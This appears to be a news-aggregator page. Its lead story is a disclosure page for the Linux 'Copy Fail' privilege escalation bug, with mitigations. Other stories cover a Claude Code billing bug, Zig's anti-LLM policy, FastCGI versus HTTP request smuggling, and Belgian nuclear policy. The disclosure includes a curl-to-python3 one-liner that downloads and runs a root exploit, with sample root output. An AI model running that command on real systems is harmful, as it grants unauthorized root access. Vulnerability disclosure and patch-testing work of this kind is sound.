10 interesting stories served every morning and every evening.

Copy Fail — 732 Bytes to Root

copy.fail

CVE-2026-31431

100% reliable

every distro since 2017

container escape primitive

732 bytes

found by Xint Code

Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.

One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.

The demo

Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.

tmux — copy fail demo

live

Who is affected

If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.

Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
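Whether AF_ALG is reachable from an unprivileged account is easy to check for yourself. A minimal probe using only the Python standard library (Linux-only; on other platforms it simply reports False):

```python
import socket

def af_alg_enabled() -> bool:
    """Return True if the kernel exposes AF_ALG sockets (Linux only)."""
    if not hasattr(socket, "AF_ALG"):
        return False  # non-Linux platform, or a very old Python build
    try:
        with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET) as s:
            # Binding to a hash algorithm is enough to prove the
            # interface is reachable from an unprivileged user.
            s.bind(("hash", "sha256"))
        return True
    except OSError:
        return False

if __name__ == "__main__":
    print("AF_ALG reachable:", af_alg_enabled())
```

A True result only confirms the attack surface exists; it does not confirm the kernel is unpatched.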

Distributions we directly verified:

These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add it to the list.

Should you patch first?

High: Multi-tenant Linux hosts
Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. Result: any user becomes root.

High: Kubernetes / container clusters
The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries. Result: cross-container, cross-tenant.

High: CI runners & build farms
GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user on a shared kernel. Result: a PR becomes root on the runner.

High: Cloud SaaS running user code
Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script. Result: tenant becomes host root.

Medium: Standard Linux servers
Single-tenant production where only your team has shell access. Result: internal LPE; chains with web RCE or stolen creds.

Lower: Single-user laptops & workstations
You’re already the only user. The bug doesn’t grant remote attackers access by itself, but any local code execution becomes root. Result: post-exploitation step-up.

Exploit

The PoC is published so defenders can verify their own systems and validate vendor patches.

Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.

copy_fail_exp.py 732 B

Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1].

sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9

Quick run:

$ curl https://copy.fail/exp | python3 && su

# id

uid=0(root) gid=1002(user) groups=1002(user)

Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431

Mitigation

Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.

Before you can patch: disable the algif_aead module.

# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf

# rmmod algif_aead 2>/dev/null || true

What does this break? For the vast majority of systems — nothing measurable.

Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.

May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.

Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.

For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
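For Docker and containerd, one way to do this is a seccomp rule that fails socket() calls for the AF_ALG family (protocol family 38 on Linux). A sketch of the relevant fragment — an assumption of how you might wire it up, to be merged into the "syscalls" array of a copy of the runtime's default profile rather than used on its own:

```json
{
  "names": ["socket"],
  "action": "SCMP_ACT_ERRNO",
  "args": [
    { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
  ]
}
```

Rule order matters: if an earlier entry in the profile allow-lists socket() unconditionally, this deny rule never fires, so verify with a test container that AF_ALG socket creation actually returns an error.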


Disclosure timeline

2026-03-23: Reported to Linux kernel security team

2026-03-24: Initial acknowledgment

2026-03-25: Patches proposed and reviewed

2026-04-01: Patch committed to mainline

2026-04-22: CVE-2026-31431 assigned

2026-04-29: Public disclosure (https://copy.fail/)

Xint Code

Is your software AI-era safe?

Copy Fail was surfaced by Xint Code in about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.

The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.

Track record

0-day RCE

ZeroDay Cloud

Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.

Top 3

DARPA AIxCC

Finalist in the AI Cyber Challenge hosted by DARPA.

DEF CON CTF

Most-winning team in DEF CON CTF history.

HERMES.md in git commit messages causes requests to route to extra usage billing instead of plan quota

github.com

Summary

When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to "extra usage" billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).

Environment

Claude Code v2.1.119

macOS (Apple Silicon)

Max 20x plan ($200/month)

Model: claude-opus-4-6[1m] (also reproduces with claude-opus-4-7)

Reproduction

Minimal reproduction — no project files needed:

# This FAILS with "out of extra usage" (routes to extra usage billing)

mkdir /tmp/test-fail && cd /tmp/test-fail

git init && echo test > test.txt && git add . && git commit -m "add HERMES.md"

claude -p "say hello" --model "claude-opus-4-6[1m]"

# => API Error: 400 "You're out of extra usage…"

# This WORKS (routes to plan quota)

mkdir /tmp/test-pass && cd /tmp/test-pass

git init && echo test > test.txt && git add . && git commit -m "add hermes.md"

claude -p "say hello" --model "claude-opus-4-6[1m]"

# => "Hello!"

# Cleanup

rm -rf /tmp/test-fail /tmp/test-pass

The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.

What triggers it vs. what doesn’t

Impact

$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota

Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity

The error message ("out of extra usage") gives no indication that content-based routing is the cause, making this extremely difficult to diagnose

Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits

Expected behavior

API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.

How I found this

Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
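That isolation step amounts to a bisect over candidate strings. A minimal sketch, assuming a hypothetical `triggers(subset)` oracle — commit the given strings to a scratch repo, run one request, and report whether it misroutes — and a single trigger string:

```python
def isolate_trigger(candidates, triggers):
    """Binary-search a list of candidate strings for the one that
    flips the oracle.

    `triggers(subset)` is a hypothetical, expensive oracle (one API
    call per invocation), so halving keeps the number of calls to
    O(log n). Assumes exactly one trigger is present in `candidates`.
    """
    while len(candidates) > 1:
        half = candidates[: len(candidates) // 2]
        # Keep whichever half still reproduces the misrouting.
        candidates = half if triggers(half) else candidates[len(half):]
    return candidates[0]
```

For a repo with dozens of distinct commit-message strings, this narrows the trigger down in a handful of runs instead of one run per string.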


Glenn Meder (@GlennMeder)

xcancel.com


The Zig project's rationale for their firm anti-AI contribution policy

simonwillison.net

Zig has one of the most stringent anti-LLM policies of any major open source project:

No LLMs for issues.

No LLMs for pull requests.

No LLMs for comments on the bug tracker, including translation. English is encouraged, but not required. You are welcome to post in your native language and rely on others to have their own translation tools of choice to interpret your words.


The most prominent project written in Zig may be the Bun JavaScript runtime, which was acquired by Anthropic in December 2025 and, unsurprisingly, makes heavy use of AI assistance.

Bun operates its own fork of Zig, and recently achieved a 4x performance improvement on Bun compile after adding "parallel semantic analysis and multiple codegen units to the llvm backend". Here’s that code. But @bunjavascript says:

We do not currently plan to upstream this, as Zig has a strict ban on LLM-authored contributions.


(Update: here’s a Zig core contributor providing details on why they wouldn’t accept that particular patch independent of the LLM issue - parallel semantic analysis is a long planned feature but "has implications for the Zig language itself".)

In Contributor Poker and Zig’s AI Ban (via Lobste.rs), Zig Software Foundation VP of Community Loris Cro explains the rationale for this strict ban. It’s the best articulation I’ve seen yet for a blanket ban on LLM-assisted contributions:

In successful open source projects you eventually reach a point where you start getting more PRs than what you’re capable of processing. Given what I mentioned so far, it would make sense to stop accepting imperfect PRs in order to maximize ROI from your work, but that’s not what we do in the Zig project. Instead, we try our best to help new contributors to get their work in, even if they need some help getting there. We don’t do this just because it’s the "right" thing to do, but also because it’s the smart thing to do.


Zig values contributors over their contributions. Each contributor represents an investment by the Zig core team - the primary goal of reviewing and accepting PRs isn’t to land new code, it’s to help grow new contributors who can become trusted and prolific over time.

LLM assistance breaks that completely. It doesn’t matter if the LLM helps you submit a perfect PR to Zig - the time the Zig team spends reviewing your work does nothing to help them add new, confident, trustworthy contributors to their overall project.

Loris explains the name here:

The reason I call it "contributor poker" is because, just like people say about the actual card game, "you play the person, not the cards". In contributor poker, you bet on the contributor, not on the contents of their first PR.


This makes a lot of sense to me. It relates to an idea I’ve seen circulating elsewhere: if a PR was mostly written by an LLM, why should a project maintainer spend time reviewing and discussing that PR as opposed to firing up their own LLM to solve the same problem?


FastCGI: 30 Years Old and Still the Better Protocol for Reverse Proxies

www.agwa.name

HTTP reverse proxying is a minefield. Just the other week, a researcher disclosed a desync vulnerability in Discord’s media proxy that allowed spying on private attachments. This is not unusual; these vulnerabilities just keep coming. The problem is the widespread use of HTTP as the protocol between reverse proxies and backends, even though it’s unfit for the job.

But we don’t have to use HTTP here. There’s a 30-year-old protocol for proxy-to-backend communication that avoids HTTP’s pitfalls. It’s called FastCGI, and its specification was released 30 years ago today.

FastCGI is a Wire Protocol, not a Process Model

It’s true that some web servers can automatically spawn FastCGI processes to handle requests for files with the .fcgi extension, much like they would for .cgi files. But you don’t have to use FastCGI this way - you can also use the FastCGI protocol just like HTTP, with requests sent over a TCP or UNIX socket to a long-running daemon that handles them as if they were HTTP requests.

For example, in Go all you have to do is import the net/http/fcgi standard library package and replace http.Serve with fcgi.Serve:

Go HTTP

l, _ := net.Listen("tcp", "127.0.0.1:8080")
http.Serve(l, handler)

Go FastCGI

l, _ := net.Listen("tcp", "127.0.0.1:8080")
fcgi.Serve(l, handler)

Everything else about your app stays the same - even your handler, which continues to use the standard http.ResponseWriter and http.Request types.

Popular proxies like Apache, Caddy, nginx, and HAProxy support FastCGI backends, and the configuration is simple:

nginx HTTP

proxy_pass http://localhost:8080;

nginx FastCGI

fastcgi_pass localhost:8080;
include fastcgi_params;

Apache HTTP

ProxyPass / http://localhost:8080/

Apache FastCGI

ProxyPass / fcgi://localhost:8080/

Caddy HTTP

reverse_proxy localhost:8080 {
    transport http {
    }
}

Caddy FastCGI

reverse_proxy localhost:8080 {
    transport fastcgi {
    }
}

HAProxy HTTP

backend app_backend
    server s1 localhost:8080

HAProxy FastCGI

fcgi-app fcgi_app
    docroot /

backend app_backend
    use-fcgi-app fcgi_app
    server s1 localhost:8080 proto fcgi

Why HTTP Sucks for Reverse Proxies: Desync Attacks / Request Smuggling

HTTP/1.1 has the tragic property of looking simple on the surface (it’s just text!) but actually being a nightmare to parse robustly. There are so many different ways to format the same HTTP message, and there are too many edge cases and ambiguities for implementations to handle consistently. As a result, no two HTTP/1.1 implementations are exactly the same, and the same message can be parsed differently by different parsers.

The most serious problem is that there is no explicit framing of HTTP messages - the message itself describes where it ends, and there are multiple ways for a message to do that, all with their own edge cases. Implementations can disagree about where a message ends, and consequently, where the next message begins. This is the foundation of HTTP desync attacks, also known as request smuggling, wherein a reverse proxy and a backend disagree about the boundaries between HTTP messages, causing all sorts of nightmare security issues, such as the Discord vulnerability I linked above.

A lot of people seem to think you can just patch the parser divergences, but this is a losing strategy. James Kettle just keeps finding new ones. After finding another batch last year, he declared "HTTP/1.1 must die".

HTTP/2, when consistently used between the proxy and backend, fixes desync by putting clear boundaries around messages, but FastCGI has been doing that since 1996 with a simpler protocol.

For context, nginx has supported FastCGI backends since its first release, but only got support for HTTP/2 backends in late 2025. Apache’s support for HTTP/2 backends is still "experimental".
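The contrast is visible in the wire format itself. Every FastCGI record starts with a fixed 8-byte header whose contentLength field frames the payload explicitly, so there is nothing for two implementations to disagree about. A minimal sketch of that framing in Python (record type 5 is FCGI_STDIN in the spec; names here follow the specification):

```python
import struct

# FastCGI record header (8 bytes, per the FastCGI 1.0 spec):
# version, type, requestId (u16), contentLength (u16), paddingLength, reserved
FCGI_HEADER = struct.Struct("!BBHHBB")

def frame(rec_type: int, request_id: int, content: bytes) -> bytes:
    """Wrap `content` in one FastCGI record. The length is stated up
    front, so a receiver can never disagree about where it ends."""
    pad = (8 - len(content) % 8) % 8  # pad body to an 8-byte boundary
    header = FCGI_HEADER.pack(1, rec_type, request_id, len(content), pad, 0)
    return header + content + b"\x00" * pad
```

Compare that with HTTP/1.1, where the receiver must reconcile Content-Length, chunked encoding, and connection close just to find the end of a message.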

Why HTTP Sucks for Reverse Proxies: Untrusted Headers

If desync attacks were the only problem, you could just use HTTP/2 and call it a day. Unfortunately, there’s another problem: HTTP has no robust way for the proxy to convey trusted information about the request, such as the real client IP address, authenticated username (if the proxy handles authentication), or client certificate details (if mTLS is used).

The only option is to stick this information in HTTP headers, alongside the headers proxied from the client, without a clear structural distinction between trusted headers from the proxy and untrusted headers from a potential attacker.

For example, the X-Real-IP header is often used to convey the client’s real IP address. In theory, if your proxy correctly deletes all instances of the X-Real-IP header (not just the first, and including case variations like x-REaL-ip) before adding its own, you’re safe. In practice, this is a minefield and there are an awful lot of ways your backend can end up trusting attacker-controlled data.

Your proxy really needs to delete not just X-Real-IP, but any header that’s used for this sort of thing, just in case some part of your stack relies on it without your knowledge. For example, the Chi middleware determines the client’s real IP address by looking at the True-Client-IP header first. Only if True-Client-IP doesn’t exist does it use X-Real-IP.
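The safe pattern is therefore: before the proxy appends its own identity headers, drop every client-supplied copy of every such header, case-insensitively. A minimal sketch in Python; the forbidden-header list is illustrative, not exhaustive:

```python
def strip_untrusted(headers):
    """Drop every client-supplied copy of identity headers, regardless
    of case or repetition, before the proxy adds its own values.

    `headers` is a list of (name, value) pairs, preserving order and
    duplicates the way HTTP allows. The set below is an example; a real
    proxy must cover every header its backends might trust.
    """
    forbidden = {"x-real-ip", "x-forwarded-for", "true-client-ip"}
    return [(k, v) for k, v in headers if k.lower() not in forbidden]
```

Filtering on `k.lower()` is what defeats tricks like x-REaL-ip, and rebuilding the list (rather than deleting the first match) is what defeats duplicated headers.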

Belgium stops decommissioning nuclear power plants

dpa-international.com

30.04.2026, 11:37

Belgium will stop decommissioning its nuclear power plants, Prime Minister Bart De Wever announced on Thursday.

The government is going to negotiate with operator ENGIE over the nationalization of the plants, De Wever said.

"This government chooses safe, affordable, and sustainable energy. With less dependence on fossil imports and more control over our own supply," he wrote on X.

ENGIE said it signed a letter of intent with the Belgian government on exclusive negotiations.

"The agreement covers the potential acquisition of the complete nuclear fleet of seven reactors, the associated personnel, all nuclear subsidiaries, as well as all associated assets and liabilities, including decommissioning and dismantling obligations," a press release said.

A basic agreement is expected to be reached by October, it said.

Belgium originally decided in 2003 to phase out nuclear power production by 2025, but political debate and energy security concerns have led to delays.

Last year the Belgian parliament voted by a large majority to end the nuclear phase-out. De Wever’s government also aims to build new nuclear power plants.

Belgium has seven nuclear reactors at two different sites, although three reactors have already been taken off the grid.

The fate of the ageing installations has been debated for decades. The country is currently heavily dependent on gas imports to cover its electricity needs as it has been struggling to expand renewable power generation significantly.

Bart De Wever on X

ENGIE press release

(c) 2026 dpa Deutsche Presse Agentur GmbH


Visit pancik.com for more.